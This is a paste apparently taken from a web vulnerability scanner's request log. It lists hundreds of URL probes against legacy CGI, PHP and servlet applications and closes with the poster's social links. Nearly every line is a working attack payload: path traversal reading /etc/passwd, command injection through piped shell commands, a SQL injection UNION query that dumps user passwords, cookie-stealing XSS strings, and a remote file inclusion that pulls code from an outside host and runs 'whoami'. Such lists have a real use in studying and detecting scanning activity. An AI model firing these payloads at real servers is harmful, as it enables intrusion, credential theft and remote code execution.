- /ows-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
- /ows-bin/Album?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0
- /ows-bin/alienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd
- /ows-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah
- /ows-bin/architext_query.pl
- /ows-bin/astrocam.cgi
- /ows-bin/banner.cgi
- /ows-bin/bannereditor.cgi
- /ows-bin/bb-ack.sh
- /ows-bin/bbcode_ref.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
- /ows-bin/bb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd
- /ows-bin/bb-histlog.sh
- /ows-bin/bb-rep.sh
- /ows-bin/bb-replog.sh
- /ows-bin/bbs_forum.cgi
- /ows-bin/blog/mt-check.cgi
- /ows-bin/book.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
- /ows-bin/c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf
- /ows-bin/c99.php
- /ows-bin/calendar
- /ows-bin/calendar/index.cgi
- /ows-bin/cart.pl
- /ows-bin/cart.pl?db='
- /ows-bin/cart32.exe
- /ows-bin/cgiwrap/~adm
- /ows-bin/cgiwrap/~daemon
- /ows-bin/cgiwrap/~GujG2
- /ows-bin/cgiwrap/~listen
- /ows-bin/cgiwrap/~unknown
- /ows-bin/classifieds/index.cgi
- /ows-bin/clickresponder.pl
- /ows-bin/common/listrec.pl
- /ows-bin/count.cgi
- /ows-bin/csPassword.cgi
- /ows-bin/csPassword/csPassword.cgi
- /ows-bin/cutecast/members/
- /ows-bin/cvsblame.cgi?file=<script>alert('Vulnerable')</script>
- /ows-bin/date
- /ows-bin/day5datanotifier.cgi
- /ows-bin/db2www/library/document.d2w/show
- /ows-bin/dcshop/orders/orders.txt
- /ows-bin/echo.bat
- /ows-bin/echo.bat?&dir+c:\\\\
- /ows-bin/emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd%00
- /ows-bin/environ.pl
- /ows-bin/excite;IFS=\\"$\\";/bin/cat
- /ows-bin/fom.cgi?file=<script>alert('Vulnerable')</script>
- /ows-bin/formmail
- /ows-bin/formmail.pl
- /ows-bin/guestbook/passwd
- /ows-bin/hello.bat?&dir+c:\\\\
- /ows-bin/ikonboard/help.cgi?
- /ows-bin/ImageFolio/admin/admin.cgi
- /ows-bin/jailshell
- /ows-bin/logs/error_log
- /ows-bin/lookwho.cgi
- /ows-bin/ls
- /ows-bin/mailit.pl
- /ows-bin/maillist.cgi
- /ows-bin/maillist.pl
- /ows-bin/main.cgi?board=FREE_BOARD&command=down_load&filename=../../../../../../../../../../etc/passwd
- /ows-bin/man.sh
- /ows-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd
- /ows-bin/mrtg.cgi?cfg=blah
- /ows-bin/MsmMask.exe?mask=/junk334
- /ows-bin/mt-static/mt-check.cgi
- /ows-bin/nbmember.cgi?cmd=list_all_users
- /ows-bin/ncommerce3/ExecMacro/macro.d2w/%0a%0a
- /ows-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd
- /ows-bin/nlog-smb.pl
- /ows-bin/nph-test-cgi
- /ows-bin/opendir.php?/etc/passwd
- /ows-bin/perlidlc.bat?&dir
- /ows-bin/pfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'
- /ows-bin/php.ini
- /ows-bin/post-query
- /ows-bin/responder.cgi
- /ows-bin/rguest.exe
- /ows-bin/rksh
- /ows-bin/robpoll.cgi
- /ows-bin/rsh
- /ows-bin/scgiwrap
- /ows-bin/scripts/*%0a.pl
- /ows-bin/search.cgi
- /ows-bin/shop/orders/orders.txt
- /ows-bin/spin_client.cgi?aaaaaaaa
- /ows-bin/stat/
- /ows-bin/store/index.cgi?page=../../../../../../../../etc/passwd
- /ows-bin/tablebuild.pl
- /ows-bin/tcsh
- /ows-bin/test.cgi
- /ows-bin/test/test.cgi
- /ows-bin/test_cgi.pl
- /ows-bin/test2.pl?<script>alert('Vulnerable');</script>
- /ows-bin/test-env
- /ows-bin/textcounter.pl
- /ows-bin/update.dpgs
- /ows-bin/uptime
- /ows-bin/webdriver
- /ows-bin/Webnews.exe
- /ows-bin/webspirs.cgi?sp.nextform=../../../../../../../../../../etc/passwd
- /ows-bin/webutil.pl
- /ows-bin/webwho.pl
- /ows-bin/wguest.exe
- /ows-bin/wwwboard.cgi.cgi
- /ows-bin/wwwboard.pl
- /ows-bin/www-sql
- /phpBB/My_eGallery/public/displayCategory.php
- /phpBB2/search.php?search_id=1\\\\
- /phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=
- /pls/sample/admin_/help/..%255cplsql.conf
- /postnuke/html/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*
- /postnuke/html/My_eGallery/public/displayCategory.php
- /postnuke/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*
- /postnuke/My_eGallery/public/displayCategory.php
- /profile.php?u=6Pi2f3zm
- /samples/sample_posteddata.php
- /scgi-bin/architext_query.pl
- /scgi-bin/banner.cgi
- /scgi-bin/bannereditor.cgi
- /scgi-bin/bb-ack.sh
- /scgi-bin/bb-histlog.sh
- /scgi-bin/bb-rep.sh
- /scgi-bin/bb-replog.sh
- /scgi-bin/book.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
- /scgi-bin/csPassword.cgi
- /scgi-bin/csPassword/csPassword.cgi
- /scgi-bin/cutecast/members/
- /scgi-bin/day5datanotifier.cgi
- /scgi-bin/logs/error_log
- /scgi-bin/lookwho.cgi
- /scgi-bin/maillist.cgi
- /scgi-bin/maillist.pl
- /scgi-bin/responder.cgi
- /scgi-bin/rguest.exe
- /scgi-bin/rksh
- /scgi-bin/rsh
- /scgi-bin/search.cgi
- /scgi-bin/tablebuild.pl
- /scgi-bin/tcsh
- /scgi-bin/test.cgi
- /scgi-bin/test/test.cgi
- /scgi-bin/webwho.pl
- /scgi-bin/wguest.exe
- /scgi-bin/wwwboard.cgi.cgi
- /scgi-bin/www-sql
- /scripts/architext_query.pl
- /scripts/banner.cgi
- /scripts/bannereditor.cgi
- /scripts/bb-ack.sh
- /scripts/bb-histlog.sh
- /scripts/bb-rep.sh
- /scripts/bb-replog.sh
- /scripts/bbs_forum.cgi
- /scripts/book.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
- /scripts/csPassword.cgi
- /scripts/csPassword/csPassword.cgi
- /scripts/cutecast/members/
- /scripts/day5datanotifier.cgi
- /scripts/iisadmin/bdir.htr
- /scripts/iisadmin/ism.dll
- /scripts/logs/error_log
- /scripts/lookwho.cgi
- /scripts/maillist.cgi
- /scripts/maillist.pl
- /scripts/man.sh
- /scripts/no-such-file.pl
- /scripts/responder.cgi
- /scripts/rguest.exe
- /scripts/rksh
- /scripts/rsh
- /scripts/samples/details.idc
- /scripts/search.cgi
- /scripts/tablebuild.pl
- /scripts/tcsh
- /scripts/test.cgi
- /scripts/test/test.cgi
- /scripts/textcounter.pl
- /scripts/tools/ctss.idc
- /scripts/webwho.pl
- /scripts/wguest.exe
- /scripts/wwwboard.cgi.cgi
- /scripts/wwwboard.pl
- /scripts/www-sql
- /sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/vmware/hostd/vmInventory.xml
- /search/results.stm?query=<script>alert('vulnerable');</script>
- /servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</script>
- /servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script>
- /servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script>
- /servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script>
- /servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script>
- /servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script>
- /site/'
- /SiteServer/Admin/commerce/foundation/domain.asp
- /SiteServer/Admin/commerce/foundation/driver.asp
- /SiteServer/Admin/commerce/foundation/DSN.asp
- /SiteServer/admin/findvserver.asp
- /SiteServer/Admin/knowledge/dsmgr/default.asp
- /SiteServer/Knowledge/Default.asp?ctr=\\"><script>alert('Vulnerable')</script>
- /soinfo.php?\\"><script>alert('Vulnerable')</script>
- /splashAdmin.php
- /ssdefs/
- /sshome/
- /sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script>
- /supporter/index.php?t=ticketfiles&id=<script><script>alert('Vulnerable')</script></script>
- /supporter/index.php?t=tickettime&id=<script><script>alert('Vulnerable')</script></script>
- /supporter/index.php?t=updateticketlog&id=<script><script>alert('Vulnerable')</script></script>
- /sysinfo.pl
- /templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script>
- /test
- /test.cgi
- /test.cgi.php
- /test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
- /test.py
- /test.sh
- /test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
- /test_cgi.php
- /test_cgi.pl
- /test-cgi
- /test-cgi.pl
- /themes/default/layouts/standard.php?page_include=http://cirt.net/rfiinc.txt??&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
- /themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script>
- /ticket.php?id=99999
- /tiki/
- /tiki/tiki-install.php
- /TiVoConnect?Command=QueryContainer&Container=/&Recurse=Yes
- /TiVoConnect?Command=QueryServer
- /tmUnblock.cgi
- /TopSitesdirectory/help.php?sid=<script>alert(document.cookie)</script>
- /tsweb/
- /tws/getStatus
- /uname.cgi
- /upload.php?type=\\"<script>alert(document.cookie)</script>
- /user.php?op=userinfo&uname=<script>alert('hi');</script>
- /usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27)
- /userinfo.php?uid=1;
- /users.php?mode=profile&uid=<script>alert(document.cookie)</script>
- /vgn/login/1,501,,00.html?cookieName=x--\\>
- /vgn/performance/TMT
- /vgn/performance/TMT/Report
- /vgn/performance/TMT/Report/XML
- /vgn/performance/TMT/reset
- /vgn/ppstats
- /vgn/previewer
- /vgn/record/previewer
- /vgn/style
- /vgn/stylepreviewer
- /vgn/vr/Deleting
- /vgn/vr/Editing
- /vgn/vr/Saving
- /vgn/vr/Select
- /viewcvs.cgi
- /webamil/test.php
- /webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>
- /webcgi/alibaba.pl|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\,
- /webcgi/architext_query.pl
- /webcgi/bannereditor.cgi
- /webcgi/bb-ack.sh
- /webcgi/bb-histlog.sh
- /webcgi/bb-rep.sh
- /webcgi/bb-replog.sh
- /webcgi/bbs_forum.cgi
- /webcgi/bizdb1-search.cgi
- /webcgi/book.cgi?action=default¤t=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
- /webcgi/csPassword/csPassword.cgi
- /webcgi/cutecast/members/
- /webcgi/day5datanotifier.cgi
- /webcgi/db2www/library/document.d2w/show
- /webcgi/logs/error_log
- /webcgi/lookwho.cgi
- /webcgi/maillist.cgi
- /webcgi/maillist.pl
- /webcgi/man.sh
- /webcgi/rguest.exe
- /webcgi/rksh
- /webcgi/rsh
- /webcgi/search.cgi
- /webcgi/tcsh
- /webcgi/test.cgi
- /webcgi/test/test.cgi
- /webcgi/textcounter.pl
- /webcgi/tst.bat|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\,
- /webcgi/webwho.pl
- /webcgi/wguest.exe
- /webcgi/wwwboard.cgi.cgi
- /webcgi/wwwboard.pl
- /webcgi/www-sql
- /webchat/register.php?register=yes&username=OverG&email=<script>alert%20(\\"Vulnerable\\")</script>&email1=<script>alert%20(\\"Vulnerable\\")</script>
- /web-console/ServerInfo.jsp
- /web-console/ServerInfo.jsp%00
- /webtop/wdk/samples/dumpRequest.jsp?J=%3Cscript%3Ealert('Vulnerable');%3C/script%3Ef
- /welcome
- /whois.cgi
- /ws_ftp.ini
- /z_user_show.php?method=showuserlink&class=<Script>javascript:alert(document.cookie)</Script>&rollid=admin&x=3da59a9da8825&
- *******
- More FROM @neonprimetime security
- http://pastebin.com/u/Neonprimetime
- https://www.virustotal.com/en/USER/neonprimetime/
- https://twitter.com/neonprimetime
- https://www.reddit.com/USER/neonprimetime
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement